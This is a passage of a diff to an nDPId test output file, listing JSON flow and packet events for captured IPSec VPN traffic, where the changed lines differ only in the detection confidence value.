{"4":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} +00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":16,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946744638499,"flow_last_seen":946744638499,"flow_idle_time":200000,"flow_min_l4_payload_len":776,"flow_max_l4_payload_len":776,"flow_tot_l4_payload_len":776,"flow_avg_l4_payload_len":776,"midstream":0,"thread_ts_msec":946744638499,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.193","src_port":10500,"dst_port":500,"l4_proto":"udp","ndpi": {"confidence": 
{"6":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} 00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":946744638499,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":94,"pkt_l4_len":60,"thread_ts_msec":946744638499,"pkt":"YDjgxTWgeJS0JASgCABFAABQc3cAAPcRY2pt7bvBwKgCZAH0KQQAPCbetk7zITGkiVIAAAAAAAAAACkgIiAAAAAAAAAANAAAABgAAEAGAAFVc59hOnD3cUhMt6aqPw=="} 01514{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":946744638499,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":842,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":842,"pkt_l4_len":808,"thread_ts_msec":946744638499,"pkt":"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\/1lTuVX20pSg0wd78lahgWmI7UPYwEqg9jMZjDlZCMEiLmQFe0Un1oHlqRMr5bur0YWYOFmXhIDmbpuDdYYTe2FZk4UyxO9yQYqnlxava5Eb30fMpgELAKsnrnWauPFmg\/ND483cWUra4SbFJUPC2aT60GVqXpKQAAJFaYhWAzRgXwwxmmNCLSkHZjhcYvCGnbRY7q28HVKg1gKQAAHAAAQAQLrJ6w\/lRWK0YeWEq0E9E8QsTPBwAAABwAAEAFSiYt1ZZ+5yll6Yhny4WW51p\/IS8="} 00563{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":24,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","packets-captured":24,"packets-processed":23,"total-skipped-flows":0,"total-l4-payload-len":11884,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":2,"total-detection-updates":0,"total-updates":0,"current-active-flows":2,"total-active-flows":2,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":13,"global_ts_msec":946745300340} 
-00687{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":42,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":946744635161,"flow_last_seen":946745301909,"flow_idle_time":200000,"flow_min_l4_payload_len":80,"flow_max_l4_payload_len":1332,"flow_tot_l4_payload_len":14900,"flow_avg_l4_payload_len":513,"midstream":0,"thread_ts_msec":946745301909,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.193","src_port":14500,"dst_port":4500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} -00684{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":42,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":946744638499,"flow_last_seen":946745300411,"flow_idle_time":200000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":800,"flow_tot_l4_payload_len":5748,"flow_avg_l4_payload_len":479,"midstream":0,"thread_ts_msec":946745301909,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.193","src_port":10500,"dst_port":500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} -00687{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":61,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":44,"flow_first_seen":946744635161,"flow_last_seen":946745725650,"flow_idle_time":200000,"flow_min_l4_payload_len":80,"flow_max_l4_payload_len":1332,"flow_tot_l4_payload_len":21828,"flow_avg_l4_payload_len":496,"midstream":0,"thread_ts_msec":946745725650,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.193","src_port":14500,"dst_port":4500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"4":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} -00684{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":61,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":946744638499,"flow_last_seen":946745723263,"flow_idle_time":200000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":800,"flow_tot_l4_payload_len":7664,"flow_avg_l4_payload_len":479,"midstream":0,"thread_ts_msec":946745725650,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.193","src_port":10500,"dst_port":500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} +00687{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":42,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":946744635161,"flow_last_seen":946745301909,"flow_idle_time":200000,"flow_min_l4_payload_len":80,"flow_max_l4_payload_len":1332,"flow_tot_l4_payload_len":14900,"flow_avg_l4_payload_len":513,"midstream":0,"thread_ts_msec":946745301909,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.193","src_port":14500,"dst_port":4500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} 
+00684{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":42,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":946744638499,"flow_last_seen":946745300411,"flow_idle_time":200000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":800,"flow_tot_l4_payload_len":5748,"flow_avg_l4_payload_len":479,"midstream":0,"thread_ts_msec":946745301909,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.193","src_port":10500,"dst_port":500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} +00687{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":61,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":44,"flow_first_seen":946744635161,"flow_last_seen":946745725650,"flow_idle_time":200000,"flow_min_l4_payload_len":80,"flow_max_l4_payload_len":1332,"flow_tot_l4_payload_len":21828,"flow_avg_l4_payload_len":496,"midstream":0,"thread_ts_msec":946745725650,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.193","src_port":14500,"dst_port":4500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} +00684{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":61,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":946744638499,"flow_last_seen":946745723263,"flow_idle_time":200000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":800,"flow_tot_l4_payload_len":7664,"flow_avg_l4_payload_len":479,"midstream":0,"thread_ts_msec":946745725650,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.193","src_port":10500,"dst_port":500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"6":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} 00563{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":62,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","packets-captured":62,"packets-processed":61,"total-skipped-flows":0,"total-l4-payload-len":29572,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":2,"total-detection-updates":0,"total-updates":4,"current-active-flows":2,"total-active-flows":2,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":18,"global_ts_msec":946747247312} -00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":76,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":946744638499,"flow_last_seen":946745723263,"flow_idle_time":200000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":800,"flow_tot_l4_payload_len":7664,"flow_avg_l4_payload_len":479,"midstream":0,"thread_ts_msec":946747248846,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.193","src_port":10500,"dst_port":500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} -00687{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":76,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":59,"flow_first_seen":946744635161,"flow_last_seen":946747248846,"flow_idle_time":200000,"flow_min_l4_payload_len":80,"flow_max_l4_payload_len":1332,"flow_tot_l4_payload_len":28756,"flow_avg_l4_payload_len":487,"midstream":0,"thread_ts_msec":946747248846,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.193","src_port":14500,"dst_port":4500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} +00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":76,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":946744638499,"flow_last_seen":946745723263,"flow_idle_time":200000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":800,"flow_tot_l4_payload_len":7664,"flow_avg_l4_payload_len":479,"midstream":0,"thread_ts_msec":946747248846,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.193","src_port":10500,"dst_port":500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} +00687{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":76,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":59,"flow_first_seen":946744635161,"flow_last_seen":946747248846,"flow_idle_time":200000,"flow_min_l4_payload_len":80,"flow_max_l4_payload_len":1332,"flow_tot_l4_payload_len":28756,"flow_avg_l4_payload_len":487,"midstream":0,"thread_ts_msec":946747248846,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.193","src_port":14500,"dst_port":4500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} 
00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":77,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946747261671,"flow_last_seen":946747261671,"flow_idle_time":200000,"flow_min_l4_payload_len":776,"flow_max_l4_payload_len":776,"flow_tot_l4_payload_len":776,"flow_avg_l4_payload_len":776,"midstream":0,"thread_ts_msec":946747261671,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.193","src_port":10500,"dst_port":500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":77,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":946747261671,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":818,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":818,"pkt_l4_len":784,"thread_ts_msec":946747261671,"pkt":"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\/zQVhq\/hJoHH8AYniN6FeuyxSfw+6v8+TZ2aV\/eQHTAekhsMir30WM6CEekhg45zfVRaj2FmD+ZfPc1J0g35pRKSQvofRlbM3fuT1WnKIqplL2fu\/HlxFtKVp0xPS4zMaJRLqRwULa\/enCJCqs7IYnzlZiNo5oI9oqCWKQAAJEKv5LxLPIWbWhlAntaMNIE8OrosW7s+IoP+1aOYvC6+KQAAHAAAQATRkAuMyksdt7ZyyotQyUgkqphqOAAAABwAAEAFZ+MQmn3luQjk\/YoBsAfZs8bK1B0="} -00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":77,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946747261671,"flow_last_seen":946747261671,"flow_idle_time":200000,"flow_min_l4_payload_len":776,"flow_max_l4_payload_len":776,"flow_tot_l4_payload_len":776,"flow_avg_l4_payload_len":776,"midstream":0,"thread_ts_msec":946747261671,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.193","src_port":10500,"dst_port":500,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} 
+00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":77,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946747261671,"flow_last_seen":946747261671,"flow_idle_time":200000,"flow_min_l4_payload_len":776,"flow_max_l4_payload_len":776,"flow_tot_l4_payload_len":776,"flow_avg_l4_payload_len":776,"midstream":0,"thread_ts_msec":946747261671,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.193","src_port":10500,"dst_port":500,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} 00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":78,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":946747261671,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":94,"pkt_l4_len":60,"thread_ts_msec":946747261671,"pkt":"YDjgxTWgeJS0JASgCABFAABQldUAAPcRQQxt7bvBwKgCZAH0KQQAPJQuAZBhkeKlmwMAAAAAAAAAACkgIiAAAAAAAAAANAAAABgAAEAGAAFVeqG9ayGKhGr+lsf4kQ=="} 01516{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":79,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":946747261671,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":842,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":842,"pkt_l4_len":808,"thread_ts_msec":946747261671,"pkt":"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\/zQVhq\/hJoHH8AYniN6FeuyxSfw+6v8+TZ2aV\/eQHTAekhsMir30WM6CEekhg45zfVRaj2FmD+ZfPc1J0g35pRKSQvofRlbM3fuT1WnKIqplL2fu\/HlxFtKVp0xPS4zMaJRLqRwULa\/enCJCqs7IYnzlZiNo5oI9oqCWKQAAJEKv5LxLPIWbWhlAntaMNIE8OrosW7s+IoP+1aOYvC6+KQAAHAAAQATRkAuMyksdt7ZyyotQyUgkqphqOAAAABwAAEAFZ+MQmn3luQjk\/YoBsAfZs8bK1B0="} 
00563{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":85,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","packets-captured":85,"packets-processed":84,"total-skipped-flows":0,"total-l4-payload-len":40332,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":3,"total-detection-updates":0,"total-updates":5,"current-active-flows":2,"total-active-flows":3,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":26,"global_ts_msec":946748116878} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":89,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":60,"flow_first_seen":946744635161,"flow_last_seen":946747261671,"flow_idle_time":200000,"flow_min_l4_payload_len":80,"flow_max_l4_payload_len":1332,"flow_tot_l4_payload_len":28836,"flow_avg_l4_payload_len":480,"midstream":0,"thread_ts_msec":946748116945,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.193","src_port":14500,"dst_port":4500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} -00684{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":89,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":946747261671,"flow_last_seen":946748116945,"flow_idle_time":200000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":800,"flow_tot_l4_payload_len":5748,"flow_avg_l4_payload_len":479,"midstream":0,"thread_ts_msec":946748116945,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.193","src_port":10500,"dst_port":500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} 
+00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":89,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":60,"flow_first_seen":946744635161,"flow_last_seen":946747261671,"flow_idle_time":200000,"flow_min_l4_payload_len":80,"flow_max_l4_payload_len":1332,"flow_tot_l4_payload_len":28836,"flow_avg_l4_payload_len":480,"midstream":0,"thread_ts_msec":946748116945,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.193","src_port":14500,"dst_port":4500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} +00684{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":89,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":946747261671,"flow_last_seen":946748116945,"flow_idle_time":200000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":800,"flow_tot_l4_payload_len":5748,"flow_avg_l4_payload_len":479,"midstream":0,"thread_ts_msec":946748116945,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.193","src_port":10500,"dst_port":500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} 00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":89,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946748252067,"flow_last_seen":946748252067,"flow_idle_time":200000,"flow_min_l4_payload_len":816,"flow_max_l4_payload_len":816,"flow_tot_l4_payload_len":816,"flow_avg_l4_payload_len":816,"midstream":0,"thread_ts_msec":946748252067,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.195","src_port":14500,"dst_port":4500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
01545{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":89,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":946748252067,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":858,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":858,"pkt_l4_len":824,"thread_ts_msec":946748252067,"pkt":"eJS0JASgYDjgxTWgCABFAANM6MpAAD8RYxnAqAJkbe27wzikEZQDOGeNAAAAANpOZUhee9vE4X9PRQEMKCsuICMIAAAAAQAAAywjAAMQsrXOsXYVW8iUlhIsUUvNjT\/voEQADww3FHRxo8Lh5XNDoNVmKGRxbykmB5j0XNFwzenOaAt3l01KgqVKbH5pkgNGhL7kplclqCyVu6i53noegjTJbis6int7lQLn21Xx9LRt5aPR38ts9B8PPBqP++xoTYB4p4zfDP022YuzS4P63bUv2ohk\/FItQHlJd0Fmu2NMTXpmgfgwx4cLEl2wojdOCV9i0OGHpCw+g39I2Tiea7iSlyCWe8tnIMVZovYpbDCgJDGw43rcluIrMbLLRtdUmdAGwzF3yMawpmK0gXt\/+zRMdKGnaBljPhx4\/\/ZvLQVEIeQAeSjocKro9zfFcz3zsKie0+tHpaDnsjH9jBk8ZPhRpRUxFqg8AQFXkkp7gRLmdQwmEhIzLpb1I1lIuvpvaO5UWMXQA7k8uQB\/mkiLG+YqXVkyN1Y0enHvmE\/A71PHs6bfiumAy42wqIXH2yvRiN3Ks0csnwHy1vrl2jjKACowTHaIWJijf7VdNvRI4ulE6Rm3KExWQEqvAivfqYx4SHovkfbyIsoNZxKN\/Fnw25ppLQ0NJsQjLYD3KcCXjM5zU1RpgZGH8fGvzodxvxDgr\/qn7IUY8kHt0ngSJDt7zq39MsFzb9ZFGDypbck+w8ML4t6RzybBt1l80+4+hBv+ZV3WqpCsLoUSW8W1IkDUtws6QQJDRV+SasL7QzLKX3UcoHTKTKfMqjMzlT\/JPKpVJFVzW3onn+XNdJ3TsN0KninOkmVi3pknAkieQCxfSzpcjbQuu3J9heIKLmuC7uQo1YPeFI\/7NP27zjElKu5qfQTekYBHfz5ucSpV2JfWki1rk2DeNVR\/k4a6BvNV+0Ihgin44j726m6Y3Jwr2bTP6ELhU3ruAU\/5su6dVhXjbQoOfojwjd0Ghb9P7CH6lJXh1wiy84wpC64Fw6mo5xAummAzZpoxIJQ2RJ\/8V0E8yMC6+tFlFq4bOyDlFJeMjPRwsKEE5h\/iwf2GPQ2prxGGfJgfQHtCEw6s52vUUiT7N4X3wlnFUNkta55O"} 
-00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":89,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946748252067,"flow_last_seen":946748252067,"flow_idle_time":200000,"flow_min_l4_payload_len":816,"flow_max_l4_payload_len":816,"flow_tot_l4_payload_len":816,"flow_avg_l4_payload_len":816,"midstream":0,"thread_ts_msec":946748252067,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.195","src_port":14500,"dst_port":4500,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} +00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":89,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946748252067,"flow_last_seen":946748252067,"flow_idle_time":200000,"flow_min_l4_payload_len":816,"flow_max_l4_payload_len":816,"flow_tot_l4_payload_len":816,"flow_avg_l4_payload_len":816,"midstream":0,"thread_ts_msec":946748252067,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.195","src_port":14500,"dst_port":4500,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} 
00728{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":90,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":946748252223,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":250,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":250,"pkt_l4_len":216,"thread_ts_msec":946748252223,"pkt":"YDjgxTWgeJS0JASgCABFAADsll0AAPcRP+Zt7bvDwKgCZBGUOKQA2ApBAAAAANpOZUhee9vE4X9PRQEMKCsuICMgAAAAAQAAAMwkAACwwtTY3LpsT\/qwmvDisdfuxNK9yYrpebO+rMZ5gosLrRPfV7l+EmjCwenOXlPnAJuTroZt2GWmHMwPx6R5Wj70Qr9DZKVTSqPq6YqJS5sGXfmFN\/1jExW+fCr7RKpVks1R0rYUvIXhcUMq0ZUYx\/gcQzqKd1Y5K58gnestiIbcfozWvwAaS\/ZalYwjttsUIr8A6e7tdKFyD5BgINSk\/rB0eTyeYdm7\/lsSjZrFmw=="} 00595{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":91,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":946748252781,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":154,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":154,"pkt_l4_len":120,"thread_ts_msec":946748252781,"pkt":"eJS0JASgYDjgxTWgCABFAACM6UxAAD8RZVfAqAJkbe27wzikEZQAeNdkAAAAANpOZUhee9vE4X9PRQEMKCsuICMIAAAAAgAAAGwwAABQbRlMTHkBUjUiFIJs0wUF7LPLrRl4iHhgYt7SBLhXlxpp\/nE4VODX3ETKtazVaSDnsVwjWda2BE7eb0FjKUfCaTvVEmiG7yYu+Hga6A=="} 00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":104,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946748266345,"flow_last_seen":946748266345,"flow_idle_time":200000,"flow_min_l4_payload_len":816,"flow_max_l4_payload_len":816,"flow_tot_l4_payload_len":816,"flow_avg_l4_payload_len":816,"midstream":0,"thread_ts_msec":946748266345,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.193","src_port":14500,"dst_port":4500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
01556{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":104,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":946748266345,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":858,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":858,"pkt_l4_len":824,"thread_ts_msec":946748266345,"pkt":"eJS0JASgYDjgxTWgCABFAANMYHpAAD8R62vAqAJkbe27wTikEZQDOLCfAAAAAP914hnvOUFtU+t6DQP4cgkuICMIAAAAAQAAAywjAAMQJG6kBzuSbgmtHm3DmL2y\/nYa\/nQiHQr5ien9M4jGctznhQLh65BLJSOLQ1\/OoPd1hL8iWIXKH6OJRvz0lkxteLxEV4slgt\/iCr81DNXSos3Vxq3mBiUra3nmmCi+9ftz4RS3DQOfeyPbrgqPq0nKy0fupVsKJ7Zxz7gFDJisD4Zcguyx2F0uGpkxEjzEZRAMnVm+iKOQNnv88Qhcsr8zj1\/SiHbHUbDEIsI1cdidANE5eorr8On\/dRHr19qai9eAN80h\/tejzikg8CsBp\/WxAroxOc5xtdJoITbwuV5cwAnWXc89gupef8s2ynw8sCxDHSmBTElq0MdpJEEWrBWZMFFt+QW5iTsF7lc1mTr2KlVatW\/frNLWT9TBxJyVROT\/qlIvRoCO28Ifm+a4NKxL2oF+cBaN1oJUIF2+NgyZGJBBzt1xNvANeS6fhmkzrterXpxuFxPXt9t4iBznp0ucpzCaXMVtomPODVrpNrBZcFISOjEcgBnHU\/f\/1qy8q\/Ygr9o86z1558Bta6Ws5mzP5vEe6fS4CXWAKUd0fycJnrqwdCur7F6A25xKjkD9VdbCoYOOfJ3svCNmQ249FAOF9sVu85qHYK7VRJunX9bja\/s9Oqb1dkTDuJeR7NWVrF\/6MKIlcjB8xbefJAKk2U\/6YfBr1iqqLzlvn1JM2qaRtwWeAO7iNi8CwbTnhKU0Dkv8lZ3+t+odHhY8JE0GOT\/XrB2P60m\/b5r60qDOgSL83oxI3pnwb\/th9Y\/ZBeQOT7RRqa5xsS\/7LRf54dHEKHvyYFxB1gidL+iEiBYnmKXKiJ93OcckD3zm1T2veg+eSK5jBviAPJilRAu\/9WSrqVLfCh41n+hz5dLo6RVdNMhRh0EaKuniXpcsmIC6OML\/